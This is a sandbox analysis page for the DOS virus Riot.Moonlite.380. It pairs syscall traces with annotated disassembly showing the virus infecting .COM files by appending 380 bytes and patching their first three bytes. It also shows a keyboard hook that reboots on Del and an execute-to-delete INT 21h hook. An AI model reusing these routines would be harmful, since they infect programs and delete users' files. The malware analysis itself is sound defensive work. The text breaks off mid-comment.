Sample viewer

vx.netlux.org/Virus.DOS.Riot.Moonlite.380


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:23:38.196282988Z 26 PC: 12b70 | Set disk transfer address
2018-12-17T22:23:38.197687205Z 78 PC: 12b7b | Find first file
2018-12-17T22:23:38.205104118Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:38.223098854Z 61 PC: 12ba4 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:23:38.230542647Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:38.235453052Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:38.23695187Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
; Viewer's disassembly window for the "Get time" row above; the first instruction
; (0x12bc7) is printed on that row. Traced PCs are the addresses right after each
; int 0x21 shown here.
; NOTE(review): the next traced call (write 380 bytes) is at PC 12b47, so the call
; target is presumably 0x12b39 with the 16-bit offset wrap not applied — confirm.
0x12bcb: call 0x22b39
; One-byte opcode (next instruction is at +1); in 16-bit code that byte is CWD,
; DX = sign extension of AX — TODO confirm the decoder mode.
0x12bce: cdq
0x12bcf: sub cx, cx    ; CX = 0
0x12bd1: mov ax, 0x4200    ; INT 21h AH=42h, AL=00h: move file pointer to CX:DX from start of file
0x12bd4: int 0x21    ; traced as "Move file pointer" (PC 12bd6)
0x12bd6: lea dx, word ptr [bp + 0x27c]    ; DX = address of the buffer at bp+0x27c
0x12bda: mov cx, 3    ; byte count
0x12bdd: mov ah, 0x40    ; INT 21h AH=40h: write to file handle
; Traced as "Write 3 bytes" (PC 12be1). The trace also shows a 3-byte read right
; after the open, so this presumably replaces the file's first three bytes — confirm.
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]    ; DX = date word for AX=5701h
0x12be5: mov cx, word ptr [bp + 0x29d]    ; CX = time word for AX=5701h
0x12be9: and cl, 0xe0    ; clear bits 0-4, the 2-second count of a DOS time word
0x12bec: or cl, 0x15    ; set that count to 0x15 (21), i.e. seconds = 42
; Every file written by this routine gets a modification time with seconds = 42,
; a fixed value usable as a triage indicator; whether the sample itself tests it
; is not visible in this window.
0x12bef: mov ax, 0x5701    ; INT 21h AX=5701h: set file date and time
0x12bf2: int 0x21    ; traced as "Get or set file date and time" (PC 12bf4)
0x12bf4: mov ah, 0x3e    ; INT 21h AH=3Eh: close file handle
0x12bf6: int 0x21    ; traced as "Close file" (PC 12bf8)
; NOTE(review): 0x29d / 0x29f / 0x2a5 are spaced like the time, date and name
; fields of a find-first record (+0x16, +0x18, +0x1e) — presumably the DTA is at
; bp+0x287; confirm.
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx    ; CX = 0; window ends here, next traced call is at PC 12c07 (file attributes)
2018-12-17T22:23:38.2391232Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:38.249678619Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:38.251467567Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:38.258860683Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:38.261100504Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:38.272165639Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:38.284263639Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:38.287699878Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:38.308670063Z 61 PC: 12ba4 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:23:38.316250973Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:38.326403477Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:38.328228957Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
; Viewer's disassembly window for the "Get time" row above; the first instruction
; (0x12bc7) is printed on that row. Traced PCs are the addresses right after each
; int 0x21 shown here.
; NOTE(review): the next traced call (write 380 bytes) is at PC 12b47, so the call
; target is presumably 0x12b39 with the 16-bit offset wrap not applied — confirm.
0x12bcb: call 0x22b39
; One-byte opcode (next instruction is at +1); in 16-bit code that byte is CWD,
; DX = sign extension of AX — TODO confirm the decoder mode.
0x12bce: cdq
0x12bcf: sub cx, cx    ; CX = 0
0x12bd1: mov ax, 0x4200    ; INT 21h AH=42h, AL=00h: move file pointer to CX:DX from start of file
0x12bd4: int 0x21    ; traced as "Move file pointer" (PC 12bd6)
0x12bd6: lea dx, word ptr [bp + 0x27c]    ; DX = address of the buffer at bp+0x27c
0x12bda: mov cx, 3    ; byte count
0x12bdd: mov ah, 0x40    ; INT 21h AH=40h: write to file handle
; Traced as "Write 3 bytes" (PC 12be1). The trace also shows a 3-byte read right
; after the open, so this presumably replaces the file's first three bytes — confirm.
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]    ; DX = date word for AX=5701h
0x12be5: mov cx, word ptr [bp + 0x29d]    ; CX = time word for AX=5701h
0x12be9: and cl, 0xe0    ; clear bits 0-4, the 2-second count of a DOS time word
0x12bec: or cl, 0x15    ; set that count to 0x15 (21), i.e. seconds = 42
; Every file written by this routine gets a modification time with seconds = 42,
; a fixed value usable as a triage indicator; whether the sample itself tests it
; is not visible in this window.
0x12bef: mov ax, 0x5701    ; INT 21h AX=5701h: set file date and time
0x12bf2: int 0x21    ; traced as "Get or set file date and time" (PC 12bf4)
0x12bf4: mov ah, 0x3e    ; INT 21h AH=3Eh: close file handle
0x12bf6: int 0x21    ; traced as "Close file" (PC 12bf8)
; NOTE(review): 0x29d / 0x29f / 0x2a5 are spaced like the time, date and name
; fields of a find-first record (+0x16, +0x18, +0x1e) — presumably the DTA is at
; bp+0x287; confirm.
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx    ; CX = 0; window ends here, next traced call is at PC 12c07 (file attributes)
2018-12-17T22:23:38.330925676Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:38.334977831Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:38.336983502Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:38.341617926Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:38.344096091Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:38.353439613Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:38.365096039Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:38.368550825Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:38.380939682Z 61 PC: 12ba4 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:23:38.389254581Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:38.396791111Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:38.399452123Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
; Viewer's disassembly window for the "Get time" row above; the first instruction
; (0x12bc7) is printed on that row. Traced PCs are the addresses right after each
; int 0x21 shown here.
; NOTE(review): the next traced call (write 380 bytes) is at PC 12b47, so the call
; target is presumably 0x12b39 with the 16-bit offset wrap not applied — confirm.
0x12bcb: call 0x22b39
; One-byte opcode (next instruction is at +1); in 16-bit code that byte is CWD,
; DX = sign extension of AX — TODO confirm the decoder mode.
0x12bce: cdq
0x12bcf: sub cx, cx    ; CX = 0
0x12bd1: mov ax, 0x4200    ; INT 21h AH=42h, AL=00h: move file pointer to CX:DX from start of file
0x12bd4: int 0x21    ; traced as "Move file pointer" (PC 12bd6)
0x12bd6: lea dx, word ptr [bp + 0x27c]    ; DX = address of the buffer at bp+0x27c
0x12bda: mov cx, 3    ; byte count
0x12bdd: mov ah, 0x40    ; INT 21h AH=40h: write to file handle
; Traced as "Write 3 bytes" (PC 12be1). The trace also shows a 3-byte read right
; after the open, so this presumably replaces the file's first three bytes — confirm.
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]    ; DX = date word for AX=5701h
0x12be5: mov cx, word ptr [bp + 0x29d]    ; CX = time word for AX=5701h
0x12be9: and cl, 0xe0    ; clear bits 0-4, the 2-second count of a DOS time word
0x12bec: or cl, 0x15    ; set that count to 0x15 (21), i.e. seconds = 42
; Every file written by this routine gets a modification time with seconds = 42,
; a fixed value usable as a triage indicator; whether the sample itself tests it
; is not visible in this window.
0x12bef: mov ax, 0x5701    ; INT 21h AX=5701h: set file date and time
0x12bf2: int 0x21    ; traced as "Get or set file date and time" (PC 12bf4)
0x12bf4: mov ah, 0x3e    ; INT 21h AH=3Eh: close file handle
0x12bf6: int 0x21    ; traced as "Close file" (PC 12bf8)
; NOTE(review): 0x29d / 0x29f / 0x2a5 are spaced like the time, date and name
; fields of a find-first record (+0x16, +0x18, +0x1e) — presumably the DTA is at
; bp+0x287; confirm.
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx    ; CX = 0; window ends here, next traced call is at PC 12c07 (file attributes)
2018-12-17T22:23:38.402286622Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:38.405672385Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:38.408091794Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:38.411016607Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:38.412635159Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:38.422242884Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:38.433779538Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:38.436482354Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:38.443620361Z 61 PC: 12ba4 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:23:38.451488313Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:38.458983253Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:38.461770042Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
; Viewer's disassembly window for the "Get time" row above; the first instruction
; (0x12bc7) is printed on that row. Traced PCs are the addresses right after each
; int 0x21 shown here.
; NOTE(review): the next traced call (write 380 bytes) is at PC 12b47, so the call
; target is presumably 0x12b39 with the 16-bit offset wrap not applied — confirm.
0x12bcb: call 0x22b39
; One-byte opcode (next instruction is at +1); in 16-bit code that byte is CWD,
; DX = sign extension of AX — TODO confirm the decoder mode.
0x12bce: cdq
0x12bcf: sub cx, cx    ; CX = 0
0x12bd1: mov ax, 0x4200    ; INT 21h AH=42h, AL=00h: move file pointer to CX:DX from start of file
0x12bd4: int 0x21    ; traced as "Move file pointer" (PC 12bd6)
0x12bd6: lea dx, word ptr [bp + 0x27c]    ; DX = address of the buffer at bp+0x27c
0x12bda: mov cx, 3    ; byte count
0x12bdd: mov ah, 0x40    ; INT 21h AH=40h: write to file handle
; Traced as "Write 3 bytes" (PC 12be1). The trace also shows a 3-byte read right
; after the open, so this presumably replaces the file's first three bytes — confirm.
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]    ; DX = date word for AX=5701h
0x12be5: mov cx, word ptr [bp + 0x29d]    ; CX = time word for AX=5701h
0x12be9: and cl, 0xe0    ; clear bits 0-4, the 2-second count of a DOS time word
0x12bec: or cl, 0x15    ; set that count to 0x15 (21), i.e. seconds = 42
; Every file written by this routine gets a modification time with seconds = 42,
; a fixed value usable as a triage indicator; whether the sample itself tests it
; is not visible in this window.
0x12bef: mov ax, 0x5701    ; INT 21h AX=5701h: set file date and time
0x12bf2: int 0x21    ; traced as "Get or set file date and time" (PC 12bf4)
0x12bf4: mov ah, 0x3e    ; INT 21h AH=3Eh: close file handle
0x12bf6: int 0x21    ; traced as "Close file" (PC 12bf8)
; NOTE(review): 0x29d / 0x29f / 0x2a5 are spaced like the time, date and name
; fields of a find-first record (+0x16, +0x18, +0x1e) — presumably the DTA is at
; bp+0x287; confirm.
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx    ; CX = 0; window ends here, next traced call is at PC 12c07 (file attributes)
2018-12-17T22:23:38.465119018Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:38.46871059Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:38.470533818Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:38.473662606Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:38.475246758Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:38.483848927Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:38.495109927Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:38.498013527Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:38.508980223Z 61 PC: 12ba4 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:23:38.528127007Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:38.534963865Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:38.536407268Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
; Viewer's disassembly window for the "Get time" row above; the first instruction
; (0x12bc7) is printed on that row. Traced PCs are the addresses right after each
; int 0x21 shown here.
; NOTE(review): the next traced call (write 380 bytes) is at PC 12b47, so the call
; target is presumably 0x12b39 with the 16-bit offset wrap not applied — confirm.
0x12bcb: call 0x22b39
; One-byte opcode (next instruction is at +1); in 16-bit code that byte is CWD,
; DX = sign extension of AX — TODO confirm the decoder mode.
0x12bce: cdq
0x12bcf: sub cx, cx    ; CX = 0
0x12bd1: mov ax, 0x4200    ; INT 21h AH=42h, AL=00h: move file pointer to CX:DX from start of file
0x12bd4: int 0x21    ; traced as "Move file pointer" (PC 12bd6)
0x12bd6: lea dx, word ptr [bp + 0x27c]    ; DX = address of the buffer at bp+0x27c
0x12bda: mov cx, 3    ; byte count
0x12bdd: mov ah, 0x40    ; INT 21h AH=40h: write to file handle
; Traced as "Write 3 bytes" (PC 12be1). The trace also shows a 3-byte read right
; after the open, so this presumably replaces the file's first three bytes — confirm.
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]    ; DX = date word for AX=5701h
0x12be5: mov cx, word ptr [bp + 0x29d]    ; CX = time word for AX=5701h
0x12be9: and cl, 0xe0    ; clear bits 0-4, the 2-second count of a DOS time word
0x12bec: or cl, 0x15    ; set that count to 0x15 (21), i.e. seconds = 42
; Every file written by this routine gets a modification time with seconds = 42,
; a fixed value usable as a triage indicator; whether the sample itself tests it
; is not visible in this window.
0x12bef: mov ax, 0x5701    ; INT 21h AX=5701h: set file date and time
0x12bf2: int 0x21    ; traced as "Get or set file date and time" (PC 12bf4)
0x12bf4: mov ah, 0x3e    ; INT 21h AH=3Eh: close file handle
0x12bf6: int 0x21    ; traced as "Close file" (PC 12bf8)
; NOTE(review): 0x29d / 0x29f / 0x2a5 are spaced like the time, date and name
; fields of a find-first record (+0x16, +0x18, +0x1e) — presumably the DTA is at
; bp+0x287; confirm.
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx    ; CX = 0; window ends here, next traced call is at PC 12c07 (file attributes)
2018-12-17T22:23:38.551257978Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:38.554581795Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:38.556270121Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:38.560252488Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:38.562353636Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:38.56845086Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:38.577390913Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:38.580390323Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:38.586749767Z 61 PC: 12ba4 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:23:38.591148846Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:38.595877535Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:38.596947584Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
; Viewer's disassembly window for the "Get time" row above; the first instruction
; (0x12bc7) is printed on that row. Traced PCs are the addresses right after each
; int 0x21 shown here.
; NOTE(review): the next traced call (write 380 bytes) is at PC 12b47, so the call
; target is presumably 0x12b39 with the 16-bit offset wrap not applied — confirm.
0x12bcb: call 0x22b39
; One-byte opcode (next instruction is at +1); in 16-bit code that byte is CWD,
; DX = sign extension of AX — TODO confirm the decoder mode.
0x12bce: cdq
0x12bcf: sub cx, cx    ; CX = 0
0x12bd1: mov ax, 0x4200    ; INT 21h AH=42h, AL=00h: move file pointer to CX:DX from start of file
0x12bd4: int 0x21    ; traced as "Move file pointer" (PC 12bd6)
0x12bd6: lea dx, word ptr [bp + 0x27c]    ; DX = address of the buffer at bp+0x27c
0x12bda: mov cx, 3    ; byte count
0x12bdd: mov ah, 0x40    ; INT 21h AH=40h: write to file handle
; Traced as "Write 3 bytes" (PC 12be1). The trace also shows a 3-byte read right
; after the open, so this presumably replaces the file's first three bytes — confirm.
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]    ; DX = date word for AX=5701h
0x12be5: mov cx, word ptr [bp + 0x29d]    ; CX = time word for AX=5701h
0x12be9: and cl, 0xe0    ; clear bits 0-4, the 2-second count of a DOS time word
0x12bec: or cl, 0x15    ; set that count to 0x15 (21), i.e. seconds = 42
; Every file written by this routine gets a modification time with seconds = 42,
; a fixed value usable as a triage indicator; whether the sample itself tests it
; is not visible in this window.
0x12bef: mov ax, 0x5701    ; INT 21h AX=5701h: set file date and time
0x12bf2: int 0x21    ; traced as "Get or set file date and time" (PC 12bf4)
0x12bf4: mov ah, 0x3e    ; INT 21h AH=3Eh: close file handle
0x12bf6: int 0x21    ; traced as "Close file" (PC 12bf8)
; NOTE(review): 0x29d / 0x29f / 0x2a5 are spaced like the time, date and name
; fields of a find-first record (+0x16, +0x18, +0x1e) — presumably the DTA is at
; bp+0x287; confirm.
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx    ; CX = 0; window ends here, next traced call is at PC 12c07 (file attributes)
2018-12-17T22:23:38.598620131Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:38.604548326Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:38.605634029Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:38.610008199Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:38.611641842Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:38.61687407Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:38.62349215Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:38.626931602Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:38.635399829Z 61 PC: 12ba4 | Open file (Filename = 'PAH.COM')
2018-12-17T22:23:38.643843506Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:38.652800493Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:38.654937229Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
; Viewer's disassembly window for the "Get time" row above; the first instruction
; (0x12bc7) is printed on that row. Traced PCs are the addresses right after each
; int 0x21 shown here.
; NOTE(review): the next traced call (write 380 bytes) is at PC 12b47, so the call
; target is presumably 0x12b39 with the 16-bit offset wrap not applied — confirm.
0x12bcb: call 0x22b39
; One-byte opcode (next instruction is at +1); in 16-bit code that byte is CWD,
; DX = sign extension of AX — TODO confirm the decoder mode.
0x12bce: cdq
0x12bcf: sub cx, cx    ; CX = 0
0x12bd1: mov ax, 0x4200    ; INT 21h AH=42h, AL=00h: move file pointer to CX:DX from start of file
0x12bd4: int 0x21    ; traced as "Move file pointer" (PC 12bd6)
0x12bd6: lea dx, word ptr [bp + 0x27c]    ; DX = address of the buffer at bp+0x27c
0x12bda: mov cx, 3    ; byte count
0x12bdd: mov ah, 0x40    ; INT 21h AH=40h: write to file handle
; Traced as "Write 3 bytes" (PC 12be1). The trace also shows a 3-byte read right
; after the open, so this presumably replaces the file's first three bytes — confirm.
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]    ; DX = date word for AX=5701h
0x12be5: mov cx, word ptr [bp + 0x29d]    ; CX = time word for AX=5701h
0x12be9: and cl, 0xe0    ; clear bits 0-4, the 2-second count of a DOS time word
0x12bec: or cl, 0x15    ; set that count to 0x15 (21), i.e. seconds = 42
; Every file written by this routine gets a modification time with seconds = 42,
; a fixed value usable as a triage indicator; whether the sample itself tests it
; is not visible in this window.
0x12bef: mov ax, 0x5701    ; INT 21h AX=5701h: set file date and time
0x12bf2: int 0x21    ; traced as "Get or set file date and time" (PC 12bf4)
0x12bf4: mov ah, 0x3e    ; INT 21h AH=3Eh: close file handle
0x12bf6: int 0x21    ; traced as "Close file" (PC 12bf8)
; NOTE(review): 0x29d / 0x29f / 0x2a5 are spaced like the time, date and name
; fields of a find-first record (+0x16, +0x18, +0x1e) — presumably the DTA is at
; bp+0x287; confirm.
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx    ; CX = 0; window ends here, next traced call is at PC 12c07 (file attributes)
2018-12-17T22:23:38.658099341Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:38.661795668Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:38.663404183Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:38.666194265Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:38.667756135Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:38.997700096Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:39.010422249Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:39.013542302Z 67 PC: 12b9b | Get or set file attributes
2018-12-17T22:23:39.025237925Z 61 PC: 12ba4 | Open file (Filename = 'TEST.COM')
2018-12-17T22:23:39.03405643Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:23:39.041438309Z 66 PC: 12bb8 | Move file pointer
2018-12-17T22:23:39.044202786Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
; Viewer's disassembly window for the "Get time" row above; the first instruction
; (0x12bc7) is printed on that row. Traced PCs are the addresses right after each
; int 0x21 shown here.
; NOTE(review): the next traced call (write 380 bytes) is at PC 12b47, so the call
; target is presumably 0x12b39 with the 16-bit offset wrap not applied — confirm.
0x12bcb: call 0x22b39
; One-byte opcode (next instruction is at +1); in 16-bit code that byte is CWD,
; DX = sign extension of AX — TODO confirm the decoder mode.
0x12bce: cdq
0x12bcf: sub cx, cx    ; CX = 0
0x12bd1: mov ax, 0x4200    ; INT 21h AH=42h, AL=00h: move file pointer to CX:DX from start of file
0x12bd4: int 0x21    ; traced as "Move file pointer" (PC 12bd6)
0x12bd6: lea dx, word ptr [bp + 0x27c]    ; DX = address of the buffer at bp+0x27c
0x12bda: mov cx, 3    ; byte count
0x12bdd: mov ah, 0x40    ; INT 21h AH=40h: write to file handle
; Traced as "Write 3 bytes" (PC 12be1). The trace also shows a 3-byte read right
; after the open, so this presumably replaces the file's first three bytes — confirm.
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]    ; DX = date word for AX=5701h
0x12be5: mov cx, word ptr [bp + 0x29d]    ; CX = time word for AX=5701h
0x12be9: and cl, 0xe0    ; clear bits 0-4, the 2-second count of a DOS time word
0x12bec: or cl, 0x15    ; set that count to 0x15 (21), i.e. seconds = 42
; Every file written by this routine gets a modification time with seconds = 42,
; a fixed value usable as a triage indicator; whether the sample itself tests it
; is not visible in this window.
0x12bef: mov ax, 0x5701    ; INT 21h AX=5701h: set file date and time
0x12bf2: int 0x21    ; traced as "Get or set file date and time" (PC 12bf4)
0x12bf4: mov ah, 0x3e    ; INT 21h AH=3Eh: close file handle
0x12bf6: int 0x21    ; traced as "Close file" (PC 12bf8)
; NOTE(review): 0x29d / 0x29f / 0x2a5 are spaced like the time, date and name
; fields of a find-first record (+0x16, +0x18, +0x1e) — presumably the DTA is at
; bp+0x287; confirm.
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx    ; CX = 0; window ends here, next traced call is at PC 12c07 (file attributes)
2018-12-17T22:23:39.047208153Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-17T22:23:39.055588783Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:23:39.057522622Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:23:39.061270297Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:23:39.063253869Z 62 PC: 12bf8 | Close file
2018-12-17T22:23:39.071718481Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:23:39.082963573Z 79 PC: 12b7b | Find next file
2018-12-17T22:23:39.085519319Z 42 PC: 12c0d | Get date 0x12c0d: cmp dl, 1
; Viewer's disassembly window for the "Get date" row above; the first instruction
; (0x12c0d: cmp dl, 1) is printed on that row. INT 21h AH=2Ah returns the day of
; the month in DL, so that compare tests for the 1st.
0x12c10: je 0x12c14    ; DL == 1: continue at the message code below
0x12c12: jmp 0x12c7b    ; any other day: skip ahead; the page's TSR row is logged at PC 12c7b
0x12c14: mov ah, 9    ; INT 21h AH=09h: print the '$'-terminated string at DS:DX
0x12c16: lea dx, word ptr [bp + 0x25b]    ; DX = address of the string at bp+0x25b
0x12c1a: int 0x21    ; the page's triggered run logs this as Display string 'Bad command or filename' (PC 12c1c)
0x12c1c: jmp 0x12c48    ; jump over 0x12c1e-0x12c47; the triggered run then logs get/set vector calls at PC 12c4d-12c76
; NOTE(review): 0x12c1e-0x12c30 has the shape of a keyboard-interrupt handler and
; is presumably the routine installed for vector 09h; the set-vector arguments
; are outside this window — confirm.
0x12c1e: push ax
0x12c1f: in al, 0x60    ; read the keyboard controller data port
0x12c21: cmp al, 0x53    ; 0x53 is the make code of the Del key
0x12c23: je 0x12c2b
0x12c25: pop ax
0x12c26: ljmp ptr cs:[0x27f]    ; other keys: continue through the far pointer stored at cs:0x27f (presumably the saved original vector)
0x12c2b: ljmp 0xffff:0    ; Del pressed: far jump to FFFF:0000, the CPU reset entry point, so the machine restarts
0x12c30: iret
; NOTE(review): 0x12c31 onward is presumably the routine installed for vector
; 21h; it tests the caller's AX — confirm against the set-vector arguments.
0x12c31: cmp ax, 0x4b00    ; 4B00h = INT 21h "load and execute program"
0x12c34: jne 0x12c3a
0x12c36: mov ah, 0x41    ; AH=41h = "delete file"; DX is not changed between the compare and the int
0x12c38: int 0x21    ; so an execute request is reissued as a delete of the same DS:DX path
; 4B9Fh is not a documented DOS function. NOTE(review): may be a residency
; self-check; the branch that follows is outside this window.
0x12c3a: cmp ax, 0x4b9f
2018-12-17T22:23:39.087830486Z 26 PC: 12c84 | Set disk transfer address
2018-12-17T22:23:39.089848405Z 76 PC: 12a5b | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4145,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:02.615533164Z 26 PC: 12b70 | Set disk transfer address
2018-12-25T11:51:02.617202686Z 78 PC: 12b7b | Find first file
2018-12-25T11:51:02.623011393Z 67 PC: 12b9b | Get or set file attributes
2018-12-25T11:51:02.637694674Z 61 PC: 12ba4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:02.655920871Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:02.662707782Z 66 PC: 12bb8 | Move file pointer
2018-12-25T11:51:02.663997664Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
; Viewer's disassembly window for the "Get time" row above; the first instruction
; (0x12bc7) is printed on that row. Traced PCs are the addresses right after each
; int 0x21 shown here.
; NOTE(review): the next traced call (write 380 bytes) is at PC 12b47, so the call
; target is presumably 0x12b39 with the 16-bit offset wrap not applied — confirm.
0x12bcb: call 0x22b39
; One-byte opcode (next instruction is at +1); in 16-bit code that byte is CWD,
; DX = sign extension of AX — TODO confirm the decoder mode.
0x12bce: cdq
0x12bcf: sub cx, cx    ; CX = 0
0x12bd1: mov ax, 0x4200    ; INT 21h AH=42h, AL=00h: move file pointer to CX:DX from start of file
0x12bd4: int 0x21    ; traced as "Move file pointer" (PC 12bd6)
0x12bd6: lea dx, word ptr [bp + 0x27c]    ; DX = address of the buffer at bp+0x27c
0x12bda: mov cx, 3    ; byte count
0x12bdd: mov ah, 0x40    ; INT 21h AH=40h: write to file handle
; Traced as "Write 3 bytes" (PC 12be1). The trace also shows a 3-byte read right
; after the open, so this presumably replaces the file's first three bytes — confirm.
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]    ; DX = date word for AX=5701h
0x12be5: mov cx, word ptr [bp + 0x29d]    ; CX = time word for AX=5701h
0x12be9: and cl, 0xe0    ; clear bits 0-4, the 2-second count of a DOS time word
0x12bec: or cl, 0x15    ; set that count to 0x15 (21), i.e. seconds = 42
; Every file written by this routine gets a modification time with seconds = 42,
; a fixed value usable as a triage indicator; whether the sample itself tests it
